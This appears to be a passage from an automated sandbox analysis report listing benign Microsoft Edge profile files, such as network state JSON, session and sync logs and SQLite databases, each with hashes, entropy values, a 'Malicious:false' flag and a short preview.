                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF422e6.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF34382.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\aba3db82-7c8e-4924-85c0-31aabc95f117.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d93fdb21-0867-430a-b194-6785d4e04bfa.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.197205941242622
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7MrN+vYfYebvqBZFUt8O7/+O/V5JfYebvqBaJ:7MuYfYebvyg8OP/JfYebvL
                                                                                                                                                                                                                                                                                  MD5:340D0816C7A44A1DEF1AC73F7BF44D20
                                                                                                                                                                                                                                                                                  SHA1:CFF6BA9DD7D6F3192BC9EA30C387598A2767C83B
                                                                                                                                                                                                                                                                                  SHA-256:55A5F68F48DCCCB3AFDB4810BE588A5470440F560FB9591915AABD4FB75D4CC7
                                                                                                                                                                                                                                                                                  SHA-512:80310C521B02DCAB0859A0A3E08952DFB5667A699D7288C41C2563D601DB96F1A5B25401FD6A2EDA580D12293578C5F9482CACE4C31A025C183438DC2433E450
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:47.141 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:41:47.144 1f7c Recovering log #3.2024/12/10-12:41:47.148 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.197205941242622
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7MrN+vYfYebvqBZFUt8O7/+O/V5JfYebvqBaJ:7MuYfYebvyg8OP/JfYebvL
                                                                                                                                                                                                                                                                                  MD5:340D0816C7A44A1DEF1AC73F7BF44D20
                                                                                                                                                                                                                                                                                  SHA1:CFF6BA9DD7D6F3192BC9EA30C387598A2767C83B
                                                                                                                                                                                                                                                                                  SHA-256:55A5F68F48DCCCB3AFDB4810BE588A5470440F560FB9591915AABD4FB75D4CC7
                                                                                                                                                                                                                                                                                  SHA-512:80310C521B02DCAB0859A0A3E08952DFB5667A699D7288C41C2563D601DB96F1A5B25401FD6A2EDA580D12293578C5F9482CACE4C31A025C183438DC2433E450
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:47.141 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:41:47.144 1f7c Recovering log #3.2024/12/10-12:41:47.148 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.209070016793372
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7iON+q2Pwkn23oH+TcwtpIFUt8Oi0XZmw+Oi3NVkwOwkn23oH+Tcwta/WLJ:7QvYfYebmFUt8OvX/+O2z5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:9ECB7414AE1F02257DC8454BD69DB9C0
                                                                                                                                                                                                                                                                                  SHA1:BE1E69B4F913988D34CC21223964C2B083723EA9
                                                                                                                                                                                                                                                                                  SHA-256:E9F35B6AED4B4812FEACD909DC9793339A983BDBA17C68FAEE925FA516D2E3A8
                                                                                                                                                                                                                                                                                  SHA-512:41AFD1DA83F1631F430BB1DEC9DBA6A1782FC634EA9145ACB69E6311EA301C7044B53F509C47F788D01307C975059CEB747436AFE7B4D2A03A588C7ACF893106
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:41:28.694 1e68 Recovering log #3.2024/12/10-12:41:28.697 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.209070016793372
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7iON+q2Pwkn23oH+TcwtpIFUt8Oi0XZmw+Oi3NVkwOwkn23oH+Tcwta/WLJ:7QvYfYebmFUt8OvX/+O2z5JfYebaUJ
                                                                                                                                                                                                                                                                                  MD5:9ECB7414AE1F02257DC8454BD69DB9C0
                                                                                                                                                                                                                                                                                  SHA1:BE1E69B4F913988D34CC21223964C2B083723EA9
                                                                                                                                                                                                                                                                                  SHA-256:E9F35B6AED4B4812FEACD909DC9793339A983BDBA17C68FAEE925FA516D2E3A8
                                                                                                                                                                                                                                                                                  SHA-512:41AFD1DA83F1631F430BB1DEC9DBA6A1782FC634EA9145ACB69E6311EA301C7044B53F509C47F788D01307C975059CEB747436AFE7B4D2A03A588C7ACF893106
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.692 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/10-12:41:28.694 1e68 Recovering log #3.2024/12/10-12:41:28.697 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.26707851465859517
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                                                                                                                                                  MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                                                                                                                                                  SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                                                                                                                                                  SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                                                                                                                                                  SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0033311577667512224
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:ImtVui//l/VTZiltl:IiVui//I
                                                                                                                                                                                                                                                                                  MD5:CBAC11E5E60164AB58A7714BC2DB8B32
                                                                                                                                                                                                                                                                                  SHA1:2B244E5D79870B26BE613CD33109578548568093
                                                                                                                                                                                                                                                                                  SHA-256:A9FA476C08FCC3B3777D624F2BC647797848C8687468DE03F34F5D52A2EDC7A4
                                                                                                                                                                                                                                                                                  SHA-512:332486D331380CE0926728507C577C2A19DC38D8511C8ED11172D2053B39B66F53822134492FD97F8F7BCD9C417F1F7A27809F1C5AB12D5653EC08F4D831EBC3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:VLnk.....?.........u.6Q.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0668736784556438
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTCnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumY7Zn6:QrzWMffmnzkkqtXnTK+hNH+5EVumO
                                                                                                                                                                                                                                                                                  MD5:139040ACC6995AED64F0CBC44A52D397
                                                                                                                                                                                                                                                                                  SHA1:6EF043C2BB9841CC0EC180DAD6CDABBF25DA1EBB
                                                                                                                                                                                                                                                                                  SHA-256:01646340D978022BFFB9023A0FE49C546A40DB87549C8877949418DDAEC856FA
                                                                                                                                                                                                                                                                                  SHA-512:0789934E73B9ACEFE4A07337327AAB0EB0EFDB44DA0C574C153C3DEF1608505E9AEC207D4EBE82762278B53259B5C359E3D3B70516F0AF6B477C34BF542E62BB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2568
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.06462527237038727
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:09n/n3lE/PlC9e:0lvC/s8
                                                                                                                                                                                                                                                                                  MD5:E922268AEE33A79DA4489A8E4B27A3FC
                                                                                                                                                                                                                                                                                  SHA1:2776CBD04E6D6DAE4F48D187E45CF933A5976772
                                                                                                                                                                                                                                                                                  SHA-256:71837BDD927A0B294B08D3F1F65A9D0F6410494CA92C9128AF76C50DA596417F
                                                                                                                                                                                                                                                                                  SHA-512:6FCE970D58FCEA2D3A0D80C84888685F9B76457287AA135D0ED8EDD0C1C2690532AE7E081B1F4C2D3FEB9BA3E5DBF2C3CBCF1BEFFB86F25390334C29F891F3DB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.............|.{...Y....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

